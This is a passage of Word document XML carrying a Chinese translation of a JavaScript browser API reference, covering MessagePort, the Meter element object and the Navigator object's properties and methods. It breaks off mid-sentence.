    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>从它已连接的端口（如果有的话）断开。之后继续调用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>将没有效果，并且将不再发送消息事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void postMessage(any </w:t>
      </w:r>
      <w:r>
        <w:t>message,[MessagePort[]ports])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>通过指定端口发送指定的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本，并将它以消息事件的格式发送到它已连接的端口。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>ports</w:t>
      </w:r>
      <w:r>
        <w:t>，也将它们当做消息的一部分一起发送。</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>可以是适用结构性复制算法（</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）的任意值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void start()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将让</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>开始触发消息事件。在这个方法调用之前，任何通过端口发送的数据都处于缓存中。这样延迟消息的方式允许脚本在发送消息之前先注册好所有事件处理程序。注意，只有在使用</w:t>
      </w:r>
      <w:r>
        <w:t>Eve</w:t>
      </w:r>
      <w:r>
        <w:t>ntTarget</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>时才需要调用这个方法。如果只是简单地设置</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>start()</w:t>
      </w:r>
      <w:r>
        <w:t>将隐式地调用。</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onmessage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性定义一个适用于消息事件的事件处理程序。消息事件由</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>对象触发，它们不会冒泡，也没有默认行为。注意，设置这个属性将调用</w:t>
      </w:r>
      <w:r>
        <w:t>start()</w:t>
      </w:r>
      <w:r>
        <w:t>方法开始消息事件的发送。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="854" w:name="Meter"/>
      <w:r>
        <w:t>Meter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="854"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>图形标尺或计量器</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Meter</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>meter</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，以图形化的表示方式显示可能的值中的范围，这个</w:t>
      </w:r>
      <w:r>
        <w:t>范围可以标注区域为低、适合以及高。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个对象的大部分属性简单地映射了同名的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性为数字，虽然对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性为字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>meter</w:t>
      </w:r>
      <w:r>
        <w:t>＞是一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>元素，在写作本书的时候，还没有广泛地支持。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Form form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前元素的祖先</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>元素，或者由</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLform</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定的</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>元素，如果存在的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double high</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定，则表示</w:t>
      </w:r>
      <w:r>
        <w:t>high</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>max</w:t>
      </w:r>
      <w:r>
        <w:t>之间值的属性应该图形化地表示为</w:t>
      </w:r>
      <w:r>
        <w:t>"high"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly NodeList labels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>由与当前元素关联的</w:t>
      </w:r>
      <w:r>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:t>元素组成的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定，则表示</w:t>
      </w:r>
      <w:r>
        <w:t>min</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>low</w:t>
      </w:r>
      <w:r>
        <w:t>之间值的属性应该图形化地表示为</w:t>
      </w:r>
      <w:r>
        <w:t>"low"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double max</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>meter</w:t>
      </w:r>
      <w:r>
        <w:t>＞可显示的最大值。默认为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double min</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>meter</w:t>
      </w:r>
      <w:r>
        <w:t>＞可显示的最小值。默认为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double optimum</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定，这个值将被认为是最佳值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>meter</w:t>
      </w:r>
      <w:r>
        <w:t>＞表示的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="855" w:name="MouseEvent"/>
      <w:r>
        <w:t>MouseEvent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="855"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="856" w:name="Navigator"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Navigator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="856"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象包含一些描述正在其中运行代码的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的属性。可以使用这些属性来实现对特定平台的定制。这个对象的名字是对</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的引用，但所有浏览器都支持它。</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象只有一个实例，可以通过任意</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>navigator</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>历史上，</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象曾用于</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>客户端嗅探</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，对不同的浏览器运行不同的代码。例</w:t>
      </w:r>
      <w:r>
        <w:t>14-3</w:t>
      </w:r>
      <w:r>
        <w:t>显示了这种用途的一个简单方法，</w:t>
      </w:r>
      <w:r>
        <w:t>14.4</w:t>
      </w:r>
      <w:r>
        <w:t>节中接下来的文字描述了依赖</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象的缺陷。跨浏览器兼容的更好的方法在</w:t>
      </w:r>
      <w:r>
        <w:t>13.4.3</w:t>
      </w:r>
      <w:r>
        <w:t>节有描述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string appName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器的名字。对基于</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器而言，这个属性的值为</w:t>
      </w:r>
      <w:r>
        <w:t>"Netscape"</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中，这个属性的值为</w:t>
      </w:r>
      <w:r>
        <w:t>"Microsoft Internet Explorer"</w:t>
      </w:r>
      <w:r>
        <w:t>。为了兼容现有的代码，许多浏览器返回较老的或欺骗性的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly string appVersion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器版本及平台信息。为了兼容现有的代码，大多数浏览器对于这个属性返回过时的旧值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Geolocation geolocation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>Geolocation</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一个引用。该对象的方法允许脚本请求用户的当前地理位置信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean onLine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果浏览器不会从网络上下载任何东西，则这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。这可能是因为浏览器确信计算机当前没有连接到网络，或者用户将浏览器设置为无网络状态。如果浏览器将尝试下载（因为计算机可能在线），这个属性将为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。当这个属性的状态改变时，浏览器将在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发</w:t>
      </w:r>
      <w:r>
        <w:t>online</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>offline</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string platform</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>运行当前浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>的操作系统以及</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>或硬件平台。这个属性没有标准的值集合，不过一些典型的值是</w:t>
      </w:r>
      <w:r>
        <w:t>"Win32"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"MacPPC"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"Linux i586"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string userAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>浏览器用于</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的</w:t>
      </w:r>
      <w:r>
        <w:t>user-agent</w:t>
      </w:r>
      <w:r>
        <w:t>头信息的值。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Mozilla/5.0(X11;U;Linux i686;en-US)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>AppleWebKit/534.16(KHTML,like Gecko)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Chrome/10.0.648.45</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Safari/534.16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r>
        <w:t>registerContentHandler(string mimeType,string url,string title)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法作为处理程序请求指定</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>的注册方式显示指定</w:t>
      </w:r>
      <w:r>
        <w:t>mimeType</w:t>
      </w:r>
      <w:r>
        <w:t>的内容。</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>是一个可供人阅读的站点标题，浏览器可能会向用户显示。</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>参数必须包含字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"%s"</w:t>
      </w:r>
      <w:r>
        <w:t>。当这个内容处理程序用于处理指定</w:t>
      </w:r>
      <w:r>
        <w:t>mimeType</w:t>
      </w:r>
      <w:r>
        <w:t>的网页时，该网页的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>将编码并插入到</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>"%s"</w:t>
      </w:r>
      <w:r>
        <w:t>的位置，然后浏览器将访问这个生成的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。这是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的一个新属性，可能有些浏览器还未实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void reg</w:t>
      </w:r>
      <w:r>
        <w:t>isterProtocolHandler(string scheme,string url,string title)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法类似于</w:t>
      </w:r>
      <w:r>
        <w:t>registerContentHandler()</w:t>
      </w:r>
      <w:r>
        <w:t>，但它将一个网站注册为用做</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:t>scheme</w:t>
      </w:r>
      <w:r>
        <w:t>的处理程序。</w:t>
      </w:r>
      <w:r>
        <w:t>scheme</w:t>
      </w:r>
      <w:r>
        <w:t>应该是一个类似</w:t>
      </w:r>
      <w:r>
        <w:t>"ma</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ilto"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"sms"</w:t>
      </w:r>
      <w:r>
        <w:t>的不带冒号的字符串。这是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的一个新属性，可能有些浏览器还未实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void yieldForStorageUpdates()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>Document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Window.localStorage</w:t>
      </w:r>
      <w:r>
